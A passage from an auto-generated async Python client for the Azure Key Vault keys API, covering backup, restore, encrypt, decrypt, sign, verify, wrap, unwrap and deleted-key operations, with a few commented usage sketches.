Vault itself. The intent of this operation is to allow a client to GENERATE a key in one Azure
Key Vault instance, BACKUP the key, and then RESTORE it into another Azure Key Vault instance.
The BACKUP operation may be used to export, in protected form, any key type from Azure Key
Vault. Individual versions of a key cannot be backed up. BACKUP / RESTORE can be performed
within geographical boundaries only; meaning that a BACKUP from one geographical area cannot be
restored to another geographical area. For example, a backup from the US geographical area
cannot be restored in an EU geographical area. This operation requires the key/backup
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BackupKeyResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.BackupKeyResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BackupKeyResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.backup_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('BackupKeyResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
backup_key.metadata = {'url': '/keys/{key-name}/backup'} # type: ignore
async def restore_key(
self,
vault_base_url: str,
parameters: "_models.KeyRestoreParameters",
**kwargs: Any
) -> "_models.KeyBundle":
"""Restores a backed up key to a vault.
Imports a previously backed up key into Azure Key Vault, restoring the key, its key identifier,
attributes and access control policies. The RESTORE operation may be used to import a
previously backed up key. Individual versions of a key cannot be restored. The key is restored
in its entirety with the same key name as it had when it was backed up. If the key name is not
available in the target Key Vault, the RESTORE operation will be rejected. While the key name
is retained during restore, the final key identifier will change if the key is restored to a
different vault. Restore will restore all versions and preserve version identifiers. The
RESTORE operation is subject to security constraints: The target Key Vault must be owned by the
        same Microsoft Azure Subscription as the source Key Vault. The user must have RESTORE permission
in the target Key Vault. This operation requires the keys/restore permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param parameters: The parameters to restore the key.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyRestoreParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.restore_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyRestoreParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restore_key.metadata = {'url': '/keys/restore'} # type: ignore
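# Illustrative sketch (not part of the generated client): a backup/restore round trip
# using the two operations above. The client instance, vault URLs, and key name are
# placeholders, and KeyRestoreParameters is assumed to carry the opaque backup blob in
# its ``key_bundle_backup`` field per the 2016-10-01 models.
#
#     backup = await client.backup_key("https://source.vault.azure.net", "my-key")
#     restored = await client.restore_key(
#         "https://target.vault.azure.net",
#         _models.KeyRestoreParameters(key_bundle_backup=backup.value),
#     )
#     print(restored.key.kid)  # the key identifier changes when restored to a different vault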
async def encrypt(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyOperationsParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Encrypts an arbitrary sequence of bytes using an encryption key that is stored in a key vault.
The ENCRYPT operation encrypts an arbitrary sequence of bytes using an encryption key that is
stored in Azure Key Vault. Note that the ENCRYPT operation only supports a single block of
data, the size of which is dependent on the target key and the encryption algorithm to be used.
The ENCRYPT operation is only strictly necessary for symmetric keys stored in Azure Key Vault
since protection with an asymmetric key can be performed using the public portion of the key. This
operation is supported for asymmetric keys as a convenience for callers that have a
key-reference but do not have access to the public key material. This operation requires the
keys/encrypt permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the encryption operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.encrypt.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyOperationsParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
encrypt.metadata = {'url': '/keys/{key-name}/{key-version}/encrypt'} # type: ignore
async def decrypt(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyOperationsParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Decrypts a single block of encrypted data.
The DECRYPT operation decrypts a well-formed block of ciphertext using the target encryption
key and specified algorithm. This operation is the reverse of the ENCRYPT operation; only a
single block of data may be decrypted, the size of this block is dependent on the target key
and the algorithm to be used. The DECRYPT operation applies to asymmetric and symmetric keys
stored in Azure Key Vault since it uses the private portion of the key. This operation requires
the keys/decrypt permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the decryption operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.decrypt.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyOperationsParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
decrypt.metadata = {'url': '/keys/{key-name}/{key-version}/decrypt'} # type: ignore
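# Illustrative sketch (not part of the generated client): an encrypt/decrypt round trip.
# The vault URL, key name/version, the "RSA-OAEP" algorithm string, and the
# ``algorithm``/``value`` fields of KeyOperationsParameters are assumptions based on the
# 2016-10-01 models, not values taken from this file.
#
#     params = _models.KeyOperationsParameters(algorithm="RSA-OAEP", value=plaintext_bytes)
#     encrypted = await client.encrypt(vault_url, "my-key", key_version, params)
#     decrypted = await client.decrypt(
#         vault_url, "my-key", key_version,
#         _models.KeyOperationsParameters(algorithm="RSA-OAEP", value=encrypted.result),
#     )
#     assert decrypted.result == plaintext_bytes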
async def sign(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeySignParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Creates a signature from a digest using the specified key.
The SIGN operation is applicable to asymmetric and symmetric keys stored in Azure Key Vault
since this operation uses the private portion of the key. This operation requires the keys/sign
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the signing operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeySignParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.sign.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeySignParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
sign.metadata = {'url': '/keys/{key-name}/{key-version}/sign'} # type: ignore
async def verify(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyVerifyParameters",
**kwargs: Any
) -> "_models.KeyVerifyResult":
"""Verifies a signature using a specified key.
The VERIFY operation is applicable to symmetric keys stored in Azure Key Vault. VERIFY is not
strictly necessary for asymmetric keys stored in Azure Key Vault since signature verification
can be performed using the public portion of the key but this operation is supported as a
convenience for callers that only have a key-reference and not the public portion of the key.
This operation requires the keys/verify permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for verify operations.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyVerifyParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyVerifyResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyVerifyResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyVerifyResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.verify.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyVerifyParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyVerifyResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
verify.metadata = {'url': '/keys/{key-name}/{key-version}/verify'} # type: ignore
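# Illustrative sketch (not part of the generated client): signing a digest and verifying
# the signature with the two operations above. The SHA-256 digest, the "RS256" algorithm
# name, and the parameter fields (``algorithm``, ``value``, ``digest``, ``signature``)
# are assumptions based on the 2016-10-01 models.
#
#     digest = hashlib.sha256(message).digest()
#     signed = await client.sign(
#         vault_url, "my-key", key_version,
#         _models.KeySignParameters(algorithm="RS256", value=digest),
#     )
#     verified = await client.verify(
#         vault_url, "my-key", key_version,
#         _models.KeyVerifyParameters(algorithm="RS256", digest=digest, signature=signed.result),
#     )
#     assert verified.value is True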
async def wrap_key(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyOperationsParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Wraps a symmetric key using a specified key.
The WRAP operation supports encryption of a symmetric key using a key encryption key that has
previously been stored in an Azure Key Vault. The WRAP operation is only strictly necessary for
symmetric keys stored in Azure Key Vault since protection with an asymmetric key can be
performed using the public portion of the key. This operation is supported for asymmetric keys
as a convenience for callers that have a key-reference but do not have access to the public key
material. This operation requires the keys/wrapKey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for wrap operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.wrap_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyOperationsParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
wrap_key.metadata = {'url': '/keys/{key-name}/{key-version}/wrapkey'} # type: ignore
async def unwrap_key(
self,
vault_base_url: str,
key_name: str,
key_version: str,
parameters: "_models.KeyOperationsParameters",
**kwargs: Any
) -> "_models.KeyOperationResult":
"""Unwraps a symmetric key using the specified key that was initially used for wrapping that key.
The UNWRAP operation supports decryption of a symmetric key using the target key encryption
key. This operation is the reverse of the WRAP operation. The UNWRAP operation applies to
asymmetric and symmetric keys stored in Azure Key Vault since it uses the private portion of
the key. This operation requires the keys/unwrapKey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the key operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.unwrap_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
'key-version': self._serialize.url("key_version", key_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'KeyOperationsParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
unwrap_key.metadata = {'url': '/keys/{key-name}/{key-version}/unwrapkey'} # type: ignore
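# Illustrative sketch (not part of the generated client): wrapping a locally generated
# symmetric key with a key-encryption key and unwrapping it again. Both calls reuse
# KeyOperationsParameters; the algorithm and field names are assumptions per the
# 2016-10-01 models, and ``local_aes_key`` is a placeholder byte string.
#
#     wrapped = await client.wrap_key(
#         vault_url, "my-kek", key_version,
#         _models.KeyOperationsParameters(algorithm="RSA-OAEP", value=local_aes_key),
#     )
#     unwrapped = await client.unwrap_key(
#         vault_url, "my-kek", key_version,
#         _models.KeyOperationsParameters(algorithm="RSA-OAEP", value=wrapped.result),
#     )
#     assert unwrapped.result == local_aes_key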
def get_deleted_keys(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.DeletedKeyListResult"]:
"""Lists the deleted keys in the specified vault.
Retrieves a list of the keys in the Key Vault as JSON Web Key structures that contain the
public part of a deleted key. This operation includes deletion-specific information. The Get
Deleted Keys operation is applicable for vaults enabled for soft-delete. While the operation
can be invoked on any vault, it will return an error if invoked on a non soft-delete enabled
vault. This operation requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified, the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeletedKeyListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.DeletedKeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_deleted_keys.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DeletedKeyListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_deleted_keys.metadata = {'url': '/deletedkeys'} # type: ignore
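# Illustrative sketch (not part of the generated client): this method returns an
# AsyncItemPaged, so callers iterate with ``async for`` and paging follows next_link
# automatically; ``maxresults`` is capped at 25 by the validation above. The vault URL
# and the DeletedKeyItem attributes shown are assumptions per the 2016-10-01 models.
#
#     async for deleted in client.get_deleted_keys(vault_url, maxresults=25):
#         print(deleted.kid, deleted.deleted_date)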
async def get_deleted_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> "_models.DeletedKeyBundle":
"""Gets the public part of a deleted key.
The Get Deleted Key operation is applicable for soft-delete enabled vaults. While the operation
can be invoked on any vault, it will return an error if invoked on a non soft-delete enabled
vault. This operation requires the keys/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedKeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedKeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_deleted_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedKeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_deleted_key.metadata = {'url': '/deletedkeys/{key-name}'} # type: ignore
async def purge_deleted_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> None:
"""Permanently deletes the specified key.
The Purge Deleted Key operation is applicable for soft-delete enabled vaults. While the
operation can be invoked on any vault, it will return an error if invoked on a non soft-delete
enabled vault. This operation requires the keys/purge permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.purge_deleted_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
purge_deleted_key.metadata = {'url': '/deletedkeys/{key-name}'} # type: ignore
async def recover_deleted_key(
self,
vault_base_url: str,
key_name: str,
**kwargs: Any
) -> "_models.KeyBundle":
"""Recovers the deleted key to its latest version.
The Recover Deleted Key operation is applicable for deleted keys in soft-delete enabled vaults.
It recovers the deleted key back to its latest version under /keys. An attempt to recover a
non-deleted key will return an error. Consider this the inverse of the delete operation on
soft-delete enabled vaults. This operation requires the keys/recover permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
